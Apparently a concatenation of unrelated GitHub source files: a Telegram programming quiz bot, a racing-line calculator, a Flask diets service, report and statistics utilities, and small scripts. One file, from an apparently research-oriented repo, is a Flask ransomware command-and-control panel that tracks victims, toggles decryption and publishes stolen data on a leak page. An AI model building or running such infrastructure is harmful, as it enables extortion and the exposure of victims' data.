explanation_parse_mode=ParseMode.MARKDOWN_V2,\n reply_markup=markup\n )\n\n\nasync def quiz_3(call: types.CallbackQuery):\n markup = InlineKeyboardMarkup()\n button_call_3 = InlineKeyboardButton(\"NEXT\", callback_data='button_call_3')\n markup.add(button_call_3)\n\n question = \"Как называется первый в мире высокоуровневый язык программирования?\"\n answers = [\n \"Фортран\",\n \"Ада\",\n \"Планкалкюль\"\n\n ]\n await bot.send_poll(\n chat_id=call.message.chat.id,\n question=question,\n options=answers,\n is_anonymous=False,\n type='quiz',\n correct_option_id=2,\n explanation=\"«Историю надо знать»\",\n explanation_parse_mode=ParseMode.MARKDOWN_V2,\n reply_markup=markup\n )\n\n\nasync def quiz_4(call: types.CallbackQuery):\n markup = InlineKeyboardMarkup()\n button_call_4 = InlineKeyboardButton(\"NEXT\", callback_data='button_call_4')\n markup.add(button_call_4)\n\n question = \"Кого называют «бабушкой Кобола»?\"\n answers = [\n \"Грейс Хоппер\",\n \"Ада Лавлейс\",\n \"Мэри Микер\"\n ]\n await bot.send_poll(\n chat_id=call.message.chat.id,\n question=question,\n options=answers,\n is_anonymous=False,\n type='quiz',\n correct_option_id=0,\n explanation=\"«Кобол это общий бизнес ориентированный язык \"\n \"Она разработала первый компилятор для компьютерного языка программирования»\",\n explanation_parse_mode=ParseMode.MARKDOWN_V2,\n reply_markup=markup\n )\n\n\nasync def quiz_5(call: types.CallbackQuery):\n markup = InlineKeyboardMarkup()\n button_call_5 = InlineKeyboardButton(\"NEXT\", callback_data='button_call_5')\n markup.add(button_call_5)\n\n question = \"Для чего Джоном Маккарти был создан язык программирования Лисп?\"\n answers = [\n \"Для работ по искусственному интеллекту\",\n \"Для управления бытовыми приборами\",\n \"Для реализации компьютерной модели вселенной\"\n ]\n await bot.send_poll(\n chat_id=call.message.chat.id,\n question=question,\n options=answers,\n is_anonymous=False,\n type='quiz',\n correct_option_id=0,\n explanation=\"«Джон Маккарти американский информатик, изобретатель»\",\n explanation_parse_mode=ParseMode.MARKDOWN_V2,\n reply_markup=markup\n )\n\n\nasync def quiz_6(call: types.CallbackQuery):\n markup = InlineKeyboardMarkup()\n button_call_6 = InlineKeyboardButton(\"NEXT\", callback_data='button_call_6')\n markup.add(button_call_6)\n\n question = \"Является ли язык программирования Си объектно-ориентированным?\"\n answers = [\n \"Да\",\n \"Нет\"\n ]\n await bot.send_poll(\n chat_id=call.message.chat.id,\n question=question,\n options=answers,\n is_anonymous=False,\n type='quiz',\n correct_option_id=1,\n explanation=\"«Легко, если значешь язык программирования Си»\",\n explanation_parse_mode=ParseMode.MARKDOWN_V2,\n reply_markup=markup\n )\n\n\nasync def quiz_7(call: types.CallbackQuery):\n markup = InlineKeyboardMarkup()\n button_call_7 = InlineKeyboardButton(\"NEXT\", callback_data='button_call_7')\n markup.add(button_call_7)\n\n question = \"К синтаксису каких языков программирования наиболее близок синтаксис C#?\"\n answers = [\n \"Фортран и Паскаль \",\n \"Ruby и Python\",\n \"C++ и Java\"\n ]\n await bot.send_poll(\n chat_id=call.message.chat.id,\n question=question,\n options=answers,\n is_anonymous=False,\n type='quiz',\n correct_option_id=2,\n explanation=\"«Легко, если значешь язык программирования C Sharp»\",\n explanation_parse_mode=ParseMode.MARKDOWN_V2,\n reply_markup=markup\n )\n\n\nasync def quiz_8(call: types.CallbackQuery):\n markup = InlineKeyboardMarkup()\n button_call_8 = InlineKeyboardButton(\"NEXT\", callback_data='button_call_8')\n markup.add(button_call_8)\n\n question = \"Что такое ассемблер?\"\n answers = [\n \"Низкоуровневый язык программирования\",\n \"Утилита трансляции программы в объектный код компьютера\",\n \"Высокоуровневый язык программирования\"\n ]\n await bot.send_poll(\n chat_id=call.message.chat.id,\n question=question,\n options=answers,\n is_anonymous=False,\n type='quiz',\n correct_option_id=1,\n explanation=\"«Ассемблер не путать с языком ассемблера»\",\n explanation_parse_mode=ParseMode.MARKDOWN_V2,\n reply_markup=markup\n )\n\n\nasync def quiz_9(call: types.CallbackQuery):\n markup = InlineKeyboardMarkup()\n button_call_9 = InlineKeyboardButton(\"NEXT\", callback_data='button_call_9')\n markup.add(button_call_9)\n\n question = \"С какого языка началась традиция использования фразы «Hello, world!» в самой первой программе \" \\\n \"при изучении нового языка программирования?\"\n answers = [\n \"Си\",\n \"C#\",\n \"C++\",\n \"Java\"\n ]\n await bot.send_poll(\n chat_id=call.message.chat.id,\n question=question,\n options=answers,\n is_anonymous=False,\n type='quiz',\n correct_option_id=0,\n explanation=\"«Надо знать историю»\",\n explanation_parse_mode=ParseMode.MARKDOWN_V2,\n reply_markup=markup\n )\n\n\nasync def quiz_10(call: types.CallbackQuery):\n markup = InlineKeyboardMarkup()\n button_call_10 = InlineKeyboardButton(\"NEXT\", callback_data='button_call_10')\n markup.add(button_call_10)\n photo = open(\"media/python_quiz2.png\", 'rb')\n await bot.send_photo(call.message.chat.id, photo=photo)\n question = \"Что выведет код?\"\n answers = [\n \"'¯\\\\\\_(ツ)_//¯'\",\n \"'¯\\_(ツ)_//¯'\",\n \"'¯\\\\\\_(ツ)_/¯'\",\n \"Ничего из перечисленного\"\n ]\n await bot.send_poll(\n chat_id=call.message.chat.id,\n question=question,\n options=answers,\n is_anonymous=False,\n type='quiz',\n correct_option_id=1,\n explanation=\"«Последовательности в Python\",\n explanation_parse_mode=ParseMode.MARKDOWN_V2,\n reply_markup=markup\n )\n\n\nasync def quiz_11(call: types.CallbackQuery):\n photo = open(\"media/python_quiz.png\", 'rb')\n await bot.send_photo(call.message.chat.id, photo=photo)\n question = \"Что выведет код? \"\n answers = [\n \"50 100\",\n \"50\",\n \"100\",\n \"Ни один из этих вариантов\"\n ]\n await bot.send_poll(\n chat_id=call.message.chat.id,\n question=question,\n options=answers,\n is_anonymous=False,\n type='quiz',\n correct_option_id=2,\n explanation=\"«Хитрый оператор AND в Python»\",\n explanation_parse_mode=ParseMode.MARKDOWN_V2\n )\n\n\ndef register_handlers_callback(dp: Dispatcher):\n dp.register_callback_query_handler(quiz_2, lambda call: call.data == \"button_call_1\")\n dp.register_callback_query_handler(quiz_3, lambda call: call.data == \"button_call_2\")\n dp.register_callback_query_handler(quiz_4, lambda call: call.data == \"button_call_3\")\n dp.register_callback_query_handler(quiz_5, lambda call: call.data == \"button_call_4\")\n dp.register_callback_query_handler(quiz_6, lambda call: call.data == \"button_call_5\")\n dp.register_callback_query_handler(quiz_7, lambda call: call.data == \"button_call_6\")\n dp.register_callback_query_handler(quiz_8, lambda call: call.data == \"button_call_7\")\n dp.register_callback_query_handler(quiz_9, lambda call: call.data == \"button_call_8\")\n dp.register_callback_query_handler(quiz_10, lambda call: call.data == \"button_call_9\")\n dp.register_callback_query_handler(quiz_11, lambda call: call.data == \"button_call_10\")\n","repo_name":"TataRus2006/GeekTech_home_work_month_3","sub_path":"handlers/callback.py","file_name":"callback.py","file_ext":"py","file_size_in_byte":9947,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"17373087353","text":"import numpy as np\nfrom scipy import interpolate\n\n# All of this, is just an implementation of this:\n# ref: http://phungdinhthang.com/2016/12/16/calculate-racing-lines-automatically/?i=1\n\n\ndef get_normal(point_a, point_b):\n v = (point_b[0] - point_a[0], point_b[1] - point_a[1])\n ln = float(np.linalg.norm(v))\n u = (v[0] / ln, v[1] / ln)\n\n return (-u[1], u[0])\n\n\ndef generate_offset_points(spline, resolution=100, distance=0.05):\n x, y = interpolate.splev(np.linspace(0, 1, int(resolution + 1)), spline)\n\n points = list(zip(list(x), list(y)))\n normals = [get_normal(point, points[i - 1])\n for i, point in enumerate(points[1:])]\n\n offset = [\n (\n point[0] + normal[0] * distance,\n point[1] + normal[1] * distance\n )\n for point, normal in zip(points, normals)]\n\n return list(zip(*offset))\n\n\nclass Line:\n def __init__(self, prev, points):\n self.prev = prev\n self.nodes = [Node(self, point) for point in points]\n self.next = None\n\n if self.prev:\n self.prev.set_next(self)\n\n def set_next(self, node):\n self.next = node\n\n\nclass Node:\n def __init__(self, line, point):\n self.line = line\n self.point = point\n self.rvm_value = {}\n self.rvm_next_node = {}\n\n\ndef generate_nodes(spline, width, res=50, segments=5):\n nodes = [\n list(zip(\n *generate_offset_points(spline, res,\n width / 2 - width / (segments - 1) * i)\n ))\n for i in range(segments)]\n\n nodes = list(zip(*nodes))\n\n return nodes\n\n\ndef fitness_function(prev, curr, nxt, alpha, beta):\n A = (curr[0] - prev[0], curr[1] - prev[1])\n B = (nxt[0] - curr[0], nxt[1] - curr[1])\n\n a = np.linalg.norm(A)\n b = np.linalg.norm(B)\n\n cos_p = (A[0] * B[0] + A[1] * B[1]) / (a * b)\n\n return alpha * cos_p - beta * (a + b)\n\n\ndef get_best_rvm(curr_line, alpha, beta):\n if not curr_line.next:\n return\n if not curr_line.prev:\n for curr_node, next_node in zip(curr_line.nodes, curr_line.next.nodes):\n curr_node.rvm_value = next_node.rvm_value\n curr_node.rvm_next_node = next_node.rvm_next_node\n return\n\n for i, node in enumerate(curr_line.nodes):\n for j, prev_node in enumerate(curr_line.prev.nodes):\n max_route_val = -np.inf\n max_node = None\n for k, next_node in enumerate(curr_line.next.nodes):\n this_route_val = fitness_function(\n prev_node.point, node.point, next_node.point, alpha, beta) \\\n + next_node.rvm_value.get(i, 0)\n if this_route_val > max_route_val:\n max_route_val = this_route_val\n max_node = k\n node.rvm_value[j] = max_route_val\n node.rvm_next_node[j] = max_node\n\n\ndef walk_nodes(line, start_i):\n curr_i = start_i\n while line:\n node = line.nodes[curr_i]\n yield node.point\n curr_i = node.rvm_next_node.get(curr_i, 0)\n line = line.next\n\n\ndef calculate_racing_line(spline, width, res=50, segments=5, alpha=0.5, beta=0.5): # noqa E501\n nodes = generate_nodes(spline, width, res, segments)\n\n lines = []\n for i, line in enumerate(nodes):\n lines.append(Line(lines[i - 1] if i != 0 else None, line))\n\n for line in reversed(lines):\n get_best_rvm(line, alpha, beta)\n\n start_index = max(\n range(segments), key=lambda i: lines[0].nodes[i].rvm_value[i]\n )\n\n paths = [list(walk_nodes(lines[0], i)) for i in range(segments)]\n\n best_path = list(walk_nodes(lines[1], start_index)) # TODO: auto select best loop path\n\n return nodes, paths, best_path\n\n\ndef to_spline(points):\n \"\"\"\n Given a set of numpy points, calculate spline\n \"\"\"\n x, y = points\n try:\n x_wrap = np.r_[x, x[0]]\n y_wrap = np.r_[y, y[0]]\n tck, _ = interpolate.splprep([x_wrap, y_wrap], s=0, per=True)\n except Exception:\n tck, _ = interpolate.splprep([x, y], s=0, per=True)\n return tck\n","repo_name":"jamesheavey/FSAI-Sim","sub_path":"vehicle_evaluator/vehicle_evaluator/racingline_calculator.py","file_name":"racingline_calculator.py","file_ext":"py","file_size_in_byte":4088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33112505936","text":"import os\n\nfrom flask import Flask, jsonify, request\nfrom diet import Diet\n\nimport pymongo\n\n# initialize\napp = Flask(__name__)\n\nport_for_mongo = os.environ.get(\"PORT_FOR_MONGO\")\n\nclient = pymongo.MongoClient(\"mongodb://mongo:{0}/\".format(port_for_mongo))\ndb = client[\"food_planner_db\"]\ndiets_collection = db[\"diets\"]\n\nall_diets = []\n\n\ndef update_all_diets_from_db():\n \"\"\"\n deletes the all_diets list and replace it with a new list.\n takes the information from the DB and puts it the new list.\n the result is an updated all_diets list\n \"\"\"\n global all_diets\n all_diets = []\n # defines the projection (fields to include/exclude)\n projection = {'_id': 0, 'sugar': 1, 'cal': 1, 'sodium': 1, 'name': 1}\n\n # find documents and apply the projection\n diets_list_from_db = list(diets_collection.find({}, projection))\n\n # iterates over the results and adds them to the all_diets list\n for diet_from_db in diets_list_from_db:\n all_diets.append(Diet(diet_from_db.get(\"name\"), diet_from_db.get(\"cal\"), diet_from_db.get(\"sodium\"),\n diet_from_db.get(\"sugar\")))\n\n\n# initializes the meals and dished from DB\nupdate_all_diets_from_db()\n\n\ndef find_diet_in_all_diets_by_name(new_diet_name: str):\n \"\"\"\n finds the first diet object the matches a given name\n :param new_diet_name: a string the represents the diet name to find\n :return: a Diet object that matches the new_new_diet_name, and None if no such Diet object exists\n \"\"\"\n global all_diets\n for diet in all_diets:\n if diet.name == new_diet_name:\n return diet\n return None\n\n\n@app.route('/diets', methods=['POST'])\ndef diets_post():\n successfully_create_message = \"Diet {} was created successfully\"\n diet_name_already_exist_message = \"Diet with {} already exists\"\n not_json_content_type_message = \"POST expects content type to be application/json\"\n\n # checks the content type of the request\n if request.content_type != \"application/json\":\n return jsonify(not_json_content_type_message), 415\n\n new_json_body = request.json\n diet_name = new_json_body.get('name')\n diet_cal = new_json_body.get('cal')\n diet_sodium = new_json_body.get('sodium')\n diet_sugar = new_json_body.get('sugar')\n\n if diet_name is None or diet_cal is None or diet_sodium is None or diet_sugar is None:\n return jsonify(\"Incorrect POST format\"), 422\n\n if find_diet_in_all_diets_by_name(diet_name) is not None:\n return jsonify(diet_name_already_exist_message.format(diet_name)), 422\n\n new_diet = Diet(diet_name, diet_cal, diet_sodium, diet_sugar)\n all_diets.append(new_diet)\n diets_collection.insert_one(new_diet.asdict())\n\n return jsonify(successfully_create_message.format(diet_name)), 201\n\n\n@app.route('/diets', methods=['GET'])\ndef diets_get():\n global all_diets\n update_all_diets_from_db()\n return jsonify([diet.asdict() for diet in all_diets]), 200\n\n\n@app.route('/diets/', methods=['GET'])\ndef diets_name_get(name):\n update_all_diets_from_db()\n existing_diet = find_diet_in_all_diets_by_name(name)\n\n if existing_diet is not None:\n return jsonify(existing_diet.asdict()), 200\n else:\n return jsonify(\"Diet {} not found\".format(name)), 404\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=80, debug=True)\n","repo_name":"itayf9/Meals_App_With_Microservices","sub_path":"diets/diets_main.py","file_name":"diets_main.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"4956066116","text":"from connect.client import R\n\nfrom reports.fields import Field, Fields\nfrom reports.utils import convert_to_datetime, get_value, today_str\n\nFIELDS = Fields((\n Field('Request ID', lambda r: get_value(r, 'id')),\n Field('Request Type', lambda r: get_value(r, 'type')),\n Field('Request Status', lambda r: get_value(r, 'status')),\n Field('Created At', lambda r: convert_to_datetime(get_value(r, 'created'))),\n Field('Updated At', lambda r: convert_to_datetime(get_value(r, 'updated'))),\n Field('Exported At', lambda _: today_str()),\n Field('Customer ID', lambda r: get_value(r, 'asset.tiers.customer.id')),\n Field('Customer Name', lambda r: get_value(r, 'asset.tiers.customer.name')),\n Field('Customer TaxID', lambda r: get_value(r, 'asset.tiers.customer.tax_id')),\n Field('Customer External ID', lambda r: get_value(r, 'asset.tiers.customer.external_id')),\n Field('Tier 1 ID', lambda r: get_value(r, 'asset.tiers.tier1.id')),\n Field('Tier 1 Name', lambda r: get_value(r, 'asset.tiers.tier1.name')),\n Field('Tier 1 External ID', lambda r: get_value(r, 'asset.tiers.tier1.external_id')),\n Field('Tier 2 ID', lambda r: get_value(r, 'asset.tiers.tier2.id')),\n Field('Tier 2 Name', lambda r: get_value(r, 'asset.tiers.tier2.name')),\n Field('Tier 2 External ID', lambda r: get_value(r, 'asset.tiers.tier2.external_id')),\n Field('Provider ID', lambda r: get_value(r, 'asset.connection.provider.id')),\n Field('Provider Name', lambda r: get_value(r, 'asset.connection.provider.name')),\n Field('Vendor ID', lambda r: get_value(r, 'asset.connection.vendor.id')),\n Field('Vendor Name', lambda r: get_value(r, 'asset.connection.vendor.name')),\n Field('Product ID', lambda r: get_value(r, 'asset.product.id')),\n Field('Product Name', lambda r: get_value(r, 'asset.product.name')),\n Field('Asset ID', lambda r: get_value(r, 'asset.id')),\n Field('Asset External ID', lambda r: get_value(r, 'asset.external_id')),\n Field('Transaction Type', lambda r: get_value(r, 'asset.connection.type')),\n Field('Hub ID', lambda r: get_value(r, 'asset.connection.hub.id')),\n Field('Hub Name', lambda r: get_value(r, 'asset.connection.hub.name')),\n Field('Asset Status', lambda r: get_value(r, 'asset.status')),\n))\n\n\ndef generate(\n client=None,\n parameters=None,\n progress_callback=None,\n renderer_type=None,\n extra_context_callback=None,\n):\n requests = _get_requests(client, parameters)\n progress = 0\n total = requests.count()\n if renderer_type == 'csv':\n yield FIELDS.names()\n progress += 1\n total += 1\n progress_callback(progress, total)\n\n for request in requests:\n values = FIELDS.process(request)\n if renderer_type == 'json':\n yield dict(zip(FIELDS.json_names(), values))\n else:\n yield values\n progress += 1\n progress_callback(progress, total)\n\n\ndef _get_requests(client, parameters):\n all_types = ['tiers_setup', 'inquiring', 'pending', 'approved', 'failed', 'draft']\n\n query = R()\n query &= R().created.ge(parameters['date']['after'])\n query &= R().created.le(parameters['date']['before'])\n\n if parameters.get('product') and parameters['product']['all'] is False:\n query &= R().asset.product.id.oneof(parameters['product']['choices'])\n if parameters.get('rr_type') and parameters['rr_type']['all'] is False:\n query &= R().type.oneof(parameters['rr_type']['choices'])\n if parameters.get('rr_status') and parameters['rr_status']['all'] is False:\n query &= R().status.oneof(parameters['rr_status']['choices'])\n else:\n query &= R().status.oneof(all_types)\n if parameters.get('mkp') and parameters['mkp']['all'] is False:\n query &= R().asset.marketplace.id.oneof(parameters['mkp']['choices'])\n if parameters.get('hub') and parameters['hub']['all'] is False:\n query &= R().asset.connection.hub.id.oneof(parameters['hub']['choices'])\n if parameters.get('environment') and parameters['environment']['all'] is False:\n query &= R().asset.connection.type.oneof(parameters['environment']['choices'])\n\n return client.requests.filter(query)\n","repo_name":"TelefonicaTC2Tech/yssb-devi-reports","sub_path":"reports/fulfillment_requests_taxid/entrypoint.py","file_name":"entrypoint.py","file_ext":"py","file_size_in_byte":4183,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"12025918675","text":"\"\"\"Command and Control webserver \n\nA Webserver that is uesed for Command and Control tasks of Malware/Ransomware.\n\nFurther more it can function as a leak / publish webserver for clients which did not pay a ransom.\n\nData leak feature uses zips.\n\"\"\"\n\nimport datetime\nimport logging\nfrom datetime import date\nfrom os import path\n\nfrom Crypto.Random import get_random_bytes\nfrom flask import Flask, render_template, request, send_file\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom .datastorage import get_toc_of_zip\nfrom .db import client_class_factory\nfrom flask_session import Session\n\nlogger = logging.getLogger(__name__)\n\n\ndef webserver_factory(path_to_db=r\"database.db\", leaked_data_storage=r\"\") -> Flask:\n # pylint: disable=no-member\n \"\"\"Create and return a Flask instance.\n\n Args:\n path_to_db (regexp, optional): _description_. Defaults to r\"database.db\".\n leaked_data_storage (str, optional): _description_. Defaults to \"\".\n\n Returns:\n Flask: The webserver object.\n \"\"\"\n\n app = Flask(__name__)\n app.secret_key = get_random_bytes(32)\n app.config[\"SESSION_TYPE\"] = \"filesystem\"\n # configure the SQLite database, relative to the app instance folder\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = r\"sqlite:///\" + path_to_db\n\n database = SQLAlchemy(app)\n Client = client_class_factory(database.Model) # pylint: disable=C0103\n Session(app)\n\n @app.template_filter(\"date\")\n def _jinja2_filter_date(date_to_convert):\n return date_to_convert.isoformat(sep=\" \", timespec=\"hours\").split(\" \")[0]\n\n @app.template_filter(\"datetime\")\n def _jinja2_filter_datetime(date_to_convert):\n return date_to_convert.isoformat(sep=\" \", timespec=\"minutes\")\n\n # Add subpaths for double extortion.\n flag_leak_data = leaked_data_storage != \"\"\n\n if flag_leak_data:\n app.logger.info(\n \"Using double extortion (leak data). Looking in %s for leaked data\",\n leaked_data_storage,\n )\n\n # Main leak page of all clients.\n @app.route(\"/leak/\")\n def leak():\n clients_found = Client.query.all()\n app.logger.info(\"Found %s leaked clients to display.\", len(clients_found))\n return render_template(\n \"leak.html\", dt=datetime.datetime.now(), clients=clients_found\n )\n\n # Specific page of a client.\n @app.route(\"/leak/\")\n def leak_client(guid):\n client_found = Client.query.filter_by(guid=guid).first()\n app.logger.info(\"Display details of client: %s \", client_found)\n if client_found is None:\n return \"bad request!\"\n\n resource = path.join(leaked_data_storage, client_found.guid + \".zip\")\n publish = False\n\n # Not payed but time left to pay\n data = \"\"\n if (\n client_found.payed_at is None\n and date.today() < client_found.release_date_of_data.date()\n ):\n publish = False\n # Payed in time.\n elif (\n client_found.payed_at is not None\n and client_found.payed_at.date()\n < client_found.release_date_of_data.date()\n ):\n publish = False\n else:\n if path.isfile(resource):\n data = get_toc_of_zip(resource)\n publish = True\n else:\n publish = False\n\n\n return render_template(\n \"leaked_client.html\",\n client=client_found,\n publish=publish,\n dt=datetime.datetime.now(),\n data=data,\n )\n\n # Download leaked files of the given client.\n @app.route(\"/api/leak-file/\")\n def api_client(guid):\n client_found = Client.query.filter_by(guid=guid).first()\n app.logger.info(\"Download leaked data of client: %s \", client_found.guid)\n\n if client_found is None:\n return \"bad request!\"\n\n # Did not pay at all\n if (client_found.payed_at is None and date.today() >= client_found.release_date_of_data.date()):\n resource = path.join(leaked_data_storage, client_found.guid + \".zip\")\n if path.isfile(resource):\n return send_file(resource, as_attachment=True)\n return \"No resource\"\n\n # API path to change the date of data leak release.\n @app.route(\"/publish/\", methods=[\"PATCH\"])\n def publish(guid):\n client_found = Client.query.filter_by(guid=guid).first()\n json = request.get_json()\n json = datetime.datetime.strptime(json[\"date\"], \"%Y-%m-%d\")\n\n app.logger.info(\"%s\", json)\n app.logger.info(\"Enabling download of leaked data from %s\", client_found)\n client_found.release_date_of_data = json\n database.session.commit()\n return \"ok\"\n\n else:\n app.logger.info(\"Not using double extortion (leak data)\")\n\n # Main page for controlling the clients.\n @app.route(\"/\")\n def main():\n clients_found = Client.query.all()\n app.logger.info(\"Number of compromised clients:%s\", len(clients_found))\n return render_template(\n \"main.html\",\n clients=clients_found,\n dt=datetime.datetime.now(),\n flag_leak_data=flag_leak_data,\n )\n\n # API path to allow decryption.\n @app.route(\"/decrypt/\", methods=[\"PATCH\"])\n def decrypt(guid):\n client_found = Client.query.filter_by(guid=guid).first()\n\n app.logger.info(\"Enabling decryption of %s\", client_found)\n client_found.decrypt = True\n database.session.commit()\n\n return \"ok\"\n\n return app\n\n\nif __name__ == \"__main__\":\n webserver_factory(\n path_to_db=r\"C:\\\\database.db\",\n leaked_data_storage=r\"C:\\\\\\\",\n ).run(debug=True)\n","repo_name":"wenzfe/analysis-of-ransomware-attacks","sub_path":"src/package_mwutils/mwutils/server/webserver.py","file_name":"webserver.py","file_ext":"py","file_size_in_byte":6006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19707730152","text":"import sys\nsys.path.append(\"../src\")\n\nfrom decay import decay\n\n\n# Set path to isotopes dictionary\ndecay.set(\"../data/isotopes.p\")\n\n# Create isotope chain dictionary\nidata = {}\n\n# Set parent isotope\nparent = 88226\n\n# Set time at which to calculate activity\ntime = 86400\n\nchain_isotopes = decay.chain_isotopes(parent)\n#decay.print_unique_isotopes(chain_isotopes)\n\nresults = decay.calculate(88226, 10000, time_steps=20, time_units='yr', parent_activity=1.0, activity_units='Bq', log='results/88ra226.txt', plot_name='results/88ra226.eps')\n\n\nprint(results)\n\n\n\n\n\n\n","repo_name":"BenPalmer1983/decay","sub_path":"examples2/88ra226.py","file_name":"88ra226.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7566891415","text":"from collections import OrderedDict\n\nimport numpy as np\nimport scipy.stats\n\n\n# Statistics Registry base classe\nclass Registry:\n def __init__(self, fallback=None):\n self._fallback = fallback\n self.__store = {}\n\n def _store(self, *keys, value=None):\n store = self.__store\n for key in keys[:-1]:\n if key not in store:\n store[key] = {}\n store = store[key]\n store[keys[-1]] = value\n\n def _fetch(self, *keys):\n try:\n store = self.__store\n for key in keys[:-1]:\n store = store[key]\n return store[keys[-1]]\n except KeyError:\n if self._fallback:\n return self._fallback._fetch(*keys)\n raise\n\n def _keys(self, *keys):\n try:\n store = self.__store\n for key in keys:\n store = store[key]\n out = list(store)\n except KeyError:\n out = []\n if self._fallback:\n out += self._fallback._keys(*keys)\n return out\n\n def register(self):\n raise NotImplementedError\n\n\nclass AggregationRegistry(Registry):\n def register(self, name, backend, agg):\n return self._store(name, backend, value=agg)\n\n def get(self, name, backend):\n return self._fetch(name, backend)\n\n def list(self):\n return self._keys()\n\n def list_backends(self, name):\n return self._keys(name)\n\n def for_backend(self, name):\n return {\n agg: self._fetch(agg, backend)\n for agg in self._keys()\n for backend in self._keys(agg)\n if backend == name\n }\n\n def for_provider(self, provider):\n if not provider.REGISTRY_KEYS:\n raise RuntimeError(\n \"Provider {} is not an instance of any registered backend.\".format(\n provider\n )\n )\n return self.for_backend(provider.REGISTRY_KEYS[0])\n\n\nclass TransformRegistry(Registry):\n def register(self, name, backend, transform):\n return self._store(name, backend, value=transform)\n\n def get(self, name, backend):\n return self._fetch(name, backend)\n\n def list(self):\n return self._keys()\n\n def list_backends(self, name):\n return self._keys(name)\n\n def for_backend(self, name):\n return {\n agg: self._fetch(agg, backend)\n for agg in self._keys()\n for backend in self._keys(agg)\n if backend == name\n }\n\n def for_provider(self, provider):\n if not provider.REGISTRY_KEYS:\n raise RuntimeError(\n \"Provider {} is not an instance of any registered backend.\".format(\n provider\n )\n )\n return self.for_backend(provider.REGISTRY_KEYS[0])\n\n\nclass DistributionRegistry(Registry):\n def register(self, name, stats, scipy_class, scipy_params):\n return self._store(\n name,\n value={\n \"stats\": stats,\n \"scipy_class\": scipy_class,\n \"scipy_params\": scipy_params,\n },\n )\n\n def get(self, name):\n return self._fetch(name)\n\n def get_stats(self, name):\n return self.get(name)[\"stats\"]\n\n def get_scipy_repr(self, name):\n dist = self.get(name)\n return (dist[\"scipy_class\"], dist[\"scipy_params\"])\n\n def list(self):\n return self._keys()\n\n\nclass StatsRegistry:\n def __init__(\n self, aggregations=None, transforms=None, distributions=None, fallback=None\n ):\n self.aggregations = aggregations or AggregationRegistry(\n fallback=fallback.aggregations if fallback else None\n )\n self.transforms = transforms or TransformRegistry(\n fallback=fallback.transforms if fallback else None\n )\n self.distributions = distributions or DistributionRegistry(\n fallback=fallback.distributions if fallback else None\n )\n\n def distribution_for_provider(self, distribution, provider):\n backend = provider.REGISTRY_KEYS[0]\n fields = self.distributions.get_stats(distribution)\n return OrderedDict(\n [\n (name, self.aggregations.get(agg, backend))\n for name, agg in fields.items()\n ]\n )\n\n\n# Create and populate global stats registry\n\nglobal_stats_registry = StatsRegistry()\nregister_distn = global_stats_registry.distributions.register\n\n# Raw distribution (distribution thrown away or manually recorded)\nregister_distn(\n name=None,\n stats=OrderedDict(\n [\n (\"raw\", \"raw\"),\n ]\n ),\n scipy_class=None,\n scipy_params=None,\n)\n\n# Count distribution\nregister_distn(\n name=\"count\",\n stats=OrderedDict(\n [\n (\"count\", \"sum\"),\n ]\n ),\n scipy_class=None,\n scipy_params=None,\n)\n\n# Normal\nregister_distn(\n name=\"normal\",\n stats=OrderedDict([(\"sum\", \"sum\"), (\"sos\", \"sos\"), (\"count\", \"count\")]),\n scipy_class=scipy.stats.distributions.norm,\n scipy_params={\n \"loc\": lambda sum, sos, count: sum,\n \"scale\": lambda sum, sos, count: np.sqrt(sos - sum**2 / (count - 1)),\n },\n)\n\n# Binomial\nregister_distn(\n name=\"binomial\",\n stats=OrderedDict([(\"sum\", \"sum\"), (\"count\", \"count\")]),\n scipy_class=scipy.stats.distributions.binom,\n scipy_params={\"n\": lambda sum, count: count, \"p\": lambda sum, count: sum / count},\n)\n","repo_name":"matthewwardrop/mensor","sub_path":"mensor/measures/registries.py","file_name":"registries.py","file_ext":"py","file_size_in_byte":5492,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"78"} +{"seq_id":"2661972253","text":"from collections import deque\n\npuzzleInput = 1364\ntarget = (31,39)\n# puzzleInput = 10\n# target = (7,4)\n\ndef isOpenSpace(x,y, favnum):\n bnum = list(bin((x*x + 3*x + 2*x*y + y + y*y) + favnum))\n l = len([i for i in bnum if i == '1'])\n return l % 2 == 0\n \nx, y = (1,1)\n\n\nvisited = set()\nvisited50 = set()\n\nq = deque()\nq.append((1,1,0))\nwhile q:\n x,y,s = q.popleft()\n if s <= 50: visited50.add((x,y))\n visited.add((x,y))\n for d in [(1,0), (-1,0), (0,1), (0,-1)]:\n x1 = x + d[0]; y1 = y + d[1]\n if x1 < 0 or y1 <0:\n continue\n if x1 == target[0] and y1 == target[1]: # goal\n print(\"Part 1:\", s+1)\n print(\"Part 2:\", len(visited50))\n exit(0)\n if not((x1,y1) in visited):\n if isOpenSpace(x1,y1, puzzleInput): # possible to go here\n q.append((x1,y1,s+1))\n","repo_name":"hanken68/aoc2016","sub_path":"day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36489330252","text":"import optparse\nimport os\nimport sys\nimport parse_deps\nimport StringIO\n\nsrcdir = os.path.abspath(os.path.join(os.path.dirname(__file__), \"../src\"))\n\ndef flatten_module_contents(filenames):\n out = StringIO.StringIO()\n load_sequence = parse_deps.calc_load_sequence(filenames, srcdir)\n\n flattened_module_names = [\"'%s'\" % module.name for module in load_sequence]\n out.write(\" if (!window.FLATTENED) window.FLATTENED = {};\\n\")\n for module in load_sequence:\n out.write(\" window.FLATTENED['%s'] = true;\\n\" % module.name);\n\n for module in load_sequence:\n out.write(module.contents)\n if module.contents[-1] != '\\n':\n out.write('\\n')\n return out.getvalue()\n\ndef flatten_style_sheet_contents(filenames):\n out = StringIO.StringIO()\n 